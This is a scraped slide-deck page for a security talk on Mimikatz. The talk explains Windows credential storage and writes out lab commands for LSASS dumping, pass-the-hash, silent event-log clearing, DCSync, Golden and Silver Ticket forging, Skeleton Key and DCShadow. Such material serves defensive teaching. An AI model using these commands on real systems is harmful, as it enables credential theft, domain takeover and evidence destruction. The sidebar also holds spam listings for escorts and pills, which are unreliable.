Digital Crime & Forensics - Presentation
Digital Crime & Forensics - PresentationDigital Crime & Forensics - Presentation
Digital Crime & Forensics - Presentationprashant3535
 
Digital Crime & Forensics - Report
Digital Crime & Forensics - ReportDigital Crime & Forensics - Report
Digital Crime & Forensics - Reportprashant3535
 
What Firefox can tell about you? - Firefox Forensics
What Firefox can tell about you? - Firefox ForensicsWhat Firefox can tell about you? - Firefox Forensics
What Firefox can tell about you? - Firefox Forensicsprashant3535
 
One Laptop Per Child
One Laptop Per ChildOne Laptop Per Child
One Laptop Per Childprashant3535
 
Data Hiding Techniques
Data Hiding TechniquesData Hiding Techniques
Data Hiding Techniquesprashant3535
 

Plus de prashant3535 (8)

BSides Pune 2024
BSides Pune 2024BSides Pune 2024
BSides Pune 2024
 
Digital Crime & Forensics - Presentation
Digital Crime & Forensics - PresentationDigital Crime & Forensics - Presentation
Digital Crime & Forensics - Presentation
 
Digital Crime & Forensics - Report
Digital Crime & Forensics - ReportDigital Crime & Forensics - Report
Digital Crime & Forensics - Report
 
What Firefox can tell about you? - Firefox Forensics
What Firefox can tell about you? - Firefox ForensicsWhat Firefox can tell about you? - Firefox Forensics
What Firefox can tell about you? - Firefox Forensics
 
Footprinting
FootprintingFootprinting
Footprinting
 
Tracking Emails
Tracking EmailsTracking Emails
Tracking Emails
 
One Laptop Per Child
One Laptop Per ChildOne Laptop Per Child
One Laptop Per Child
 
Data Hiding Techniques
Data Hiding TechniquesData Hiding Techniques
Data Hiding Techniques
 

Dernier

"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...Zilliz
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Orbitshub
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...apidays
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsNanddeep Nachan
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelDeepika Singh
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontologyjohnbeverley2021
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusZilliz
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWERMadyBayot
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...apidays
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 

Dernier (20)

"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 

Mimikatz

  • 1. Sydney Level 8, 59 Goulburn Street Sydney NSW 2000 Melbourne Level 15, 401 Docklands Drive Docklands VIC 3008 Tel. 1300 922 923 Intl. +61 2 9290 4444 www.senseofsecurity.com.au Sense of Security Pty Ltd ABN 14 098 237 908 @ITSecurityAU Compliance, Protection & Business Confidence 31 August 18 mimikatz A little tool to play with Windows security Prashant Mahajan
  • 3. Answer to the Ultimate Question of Life, the Universe, and Everything 31 August 18 Mimikatz is
  • 5. 31 August 18 Minesweeper J https://twitter.com/M_haggis/status/1032798552517423105
  • 7. • Benjamin DELPY, you can contact him on Twitter (@gentilkiwi) or by mail (benjamin [at] gentilkiwi.com) or visit his blog (http://blog.gentilkiwi.com/) • Vincent LE TOUX, a few contributions to mimikatz including the DCSync function in lsadump module, you contact him on Twitter (@mysmartlogon) or by mail (vincent.letoux [at] gmail.com) or visit his website (http://www.mysmartlogon.com) 31 August 18 Authors
  • 8. Agenda 31 August 18 • sekurlsa::logonpasswords • Just scratching the surface on the capabilities • SekurLSA module • Event module • DCSync • Golden Ticket • Silver Ticket • Skeleton Key • SIDHistory • DCShadow
  • 9. • After a user logs on, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. • This is meant to facilitate Single Sign-On (SSO) ensuring a user isn’t prompted each time resource access is requested. • The credential data may include Kerberos tickets, NTLM password hashes, LM password hashes (if the password is <15 characters, depending on Windows OS version and patch level), and even clear-text passwords to support WDigest and SSP authentication among others. 31 August 18 Credentials in Memory ? ! https://adsecurity.org/?page_id=1821
  • 10. 31 August 18 Credential Data Chart Benjamin Delpy posted an Excel chart on OneDrive (no longer available) http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png
  • 13. 31 August 18 EXE / PS1 / DLL https://twitter.com/gentilkiwi/status/887823565046910977 https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/
  • 14. procdump.exe -accepteula -ma lsass.exe lsass.dmp sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords 31 August 18 ProcDump or Task Manager https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
  • 15. 31 August 18 No Debug Privs ? !
  • 16. 31 August 18 No Debug Privs ? ! https://twitter.com/gentilkiwi/status/1032161555964723200 https://twitter.com/gentilkiwi/status/1032270189444911104
  • 17. The Local Security Authority (LSA), which resides within the Local Security Authority Security Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional protection for the LSA to prevent code injection by non-protected processes. This provides added security for the credentials that the LSA stores and manages. This protected process setting for LSA can be configured in Windows 8.1 but is on by default in Windows RT 8.1 and cannot be changed. 31 August 18 RunAsPPL https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/credentials-protection-and-management
  • 20. 31 August 18 Pass the Hash sekurlsa::pth /user:da /domain:sos.labs /ntlm:eaabfdbde55b39c1a9b8d6786afd251e /run:powershell.exe
  • 21. privilege::debug Get Debug Privs J event::drop Patch Events service to avoid new events. event::clear Clear the event log without any log cleared event (1102) being logged. 31 August 18 Event module
  • 25. 31 August 18 DCSync lsadump::dcsync /domain:sos.labs /all /csv
  • 28. • A Golden Ticket (GT) is a TGT using the KRBTGT NTLM password hash to encrypt and sign. • A GT can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain. • Since the GT is an authentication ticket, its scope is the entire domain (and the AD forest by leveraging SID History) since the TGT is used to get service tickets (TGS) used to access resources. • The GT contains user group membership information (PAC) and is signed and encrypted using the domain’s Kerberos service account (KRBTGT) which can only be opened and read by the KRBTGT account. 31 August 18 Golden Ticket https://adsecurity.org/?page_id=1821
  • 29. To summarize, once an attacker gets access to the KRBTGT password NTLM/RC4/AES128/AES256, they can create Golden Tickets (TGT) that can provide access to anything in AD at any time. Mimikatz adds the following groups to the ticket by default: • Domain Users SID: S-1-5-21<DOMAINID>-513 • Domain Admins SID: S-1-5-21<DOMAINID>-512 • Schema Admins SID: S-1-5-21<DOMAINID>-518 • Enterprise Admins SID: S-1-5-21<DOMAINID>-519 (this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights) • Group Policy Creator Owners SID: S-1-5-21<DOMAINID>-520 31 August 18 Golden Ticket https://adsecurity.org/?page_id=1821
  • 30. kerberos::golden /user:doesnotexist /domain:sos.labs /id:9999 /sid:S-1-5-21-2872888145-3513486857-3924934394 /krbtgt:99d196d2968eb268cb69529153a48623 /ptt • /user – account to be impersonated or any username • /id – RID of the account to be impersonated. This could be a real account ID, such as the default administrator ID of 500, or a fake ID. • /groups - list of groups to which the account in the ticket will belong • /sids – to insert a SID into the SIDHistory attribute of the account in the ticket • /ptt – Pass the Ticket to load the golden ticket into the current session 31 August 18 Golden Ticket
  • 31. A Silver Ticket is a TGS (similar to TGT in format) using the AD computer/service account (can be identified by SPN) NTLM password hash to encrypt and sign. Mimikatz adds the following groups to the ticket by default: • Domain Users SID: S-1-5-21<DOMAINID>-513 • Domain Admins SID: S-1-5-21<DOMAINID>-512 • Schema Admins SID: S-1-5-21<DOMAINID>-518 • Enterprise Admins SID: S-1-5-21<DOMAINID>-519 (this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights) • Group Policy Creator Owners SID: S-1-5-21<DOMAINID>-520 31 August 18 Silver Ticket https://adsecurity.org/?page_id=1821
  • 32. kerberos::golden /user:user1 /domain:sos.labs /id:1108 /sid:S-1-5-21-2872888145-3513486857-3924934394 /target:dc1.sos.labs /rc4:fbdcd5041c96ddbd82224270b57f11fc /server:http /ptt • /target –the host (SPN value). sos.labs domain has dc1.sos.labs • /service –the name of the service that we will create tickets for (must be a service running as the service account) • /user –the user that the ticket will be created for, and this can be any user account whatsoever, even user accounts that do not exist • /groups - list of groups to which the account in the ticket will belong to. Domain Admins is included by default • /rc4 – NTLM hash of the account or /aes128 /aes256 keys 31 August 18 Silver Ticket
  • 36. • Inject Skeleton Key into LSASS process on Domain Controller. • This enables all user authentication to the Skeleton Key patched DC to use a “master password (mimikatz)” (aka Skeleton Keys) as well as their usual password. • Reboot removes the Skeleton Key injection. 31 August 18 Skeleton Key
  • 37. 31 August 18 Security Identifiers (SID) module
  • 41. Start the mimidrv service Elevate to SYSTEM 31 August 18 DCShadow
  • 43. Running as SYSTEM 31 August 18 DCShadow
  • 44. Running as Domain Admin 31 August 18 DCShadow
  • 46. What can you do ? • Add user to privileged groups such as Domain Admins, Enterprise Admins • Add SIDHistory • Change PrimaryGroupID • Etc 31 August 18 DCShadow
  • 47. The following permissions on AD Object’s are required: Domain object • DS-Install-Replica (Add/Remove Replica in Domain) • DS-Replication-Manage-Topology (Manage Replication Topology) • DS-Replication-Synchronize (Replication Synchornization) Sites object in the Configuration container • CreateChild and DeleteChild Computer object of the attacker's machine (which is registered as a Fake DC) • WriteProperty Target object (user or computer or ADSPath) • WriteProperty 31 August 18 DCShadow https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1
  • 51. mimikatz # privilege::debug Privilege '20' OK mimikatz # crypto::cng "KeyIso" service patched mimikatz # crypto::capi Local CryptoAPI patched mimikatz # crypto::certificates /export * System Store : 'CURRENT_USER' (0x00010000) * Store : 'My' mimikatz # crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE mimikatz # crypto::keys /export 31 August 18
  • 56. 31 August 18 System Environment Value module
  • 57. 31 August 18 Token manipulation module
  • 58. 31 August 18 Terminal Server module
  • 59. 31 August 18 IIS XML Config module
  • 60. 31 August 18 Data Protection API module
  • 61. Sydney Level 8, 59 Goulburn Street Sydney NSW 2000 Melbourne Level 15, 401 Docklands Drive Docklands VIC 3008 Tel. 1300 922 923 Intl. +61 2 9290 4444 www.senseofsecurity.com.au Sense of Security Pty Ltd ABN 14 098 237 908 @ITSecurityAU Security, it’s all we do. Knowledge, Experience & Trust. Questions?
  • 62. Sydney Level 8, 59 Goulburn Street Sydney NSW 2000 Melbourne Level 15, 401 Docklands Drive Docklands VIC 3008 Tel. 1300 922 923 Intl. +61 2 9290 4444 www.senseofsecurity.com.au Sense of Security Pty Ltd ABN 14 098 237 908 @ITSecurityAU Security, it’s all we do. Knowledge, Experience & Trust. Thank You! © 2002 – 2018 Sense of Security Pty Limited. All rights reserved. Some images used under license from Shutterstock.com or with permission from respective trademark owners. No part of this publication may be reproduced, distributed, or transmitted in any form or by any means, including photocopying, recording, or other electronic or mechanical methods, without the prior written permission of the publisher.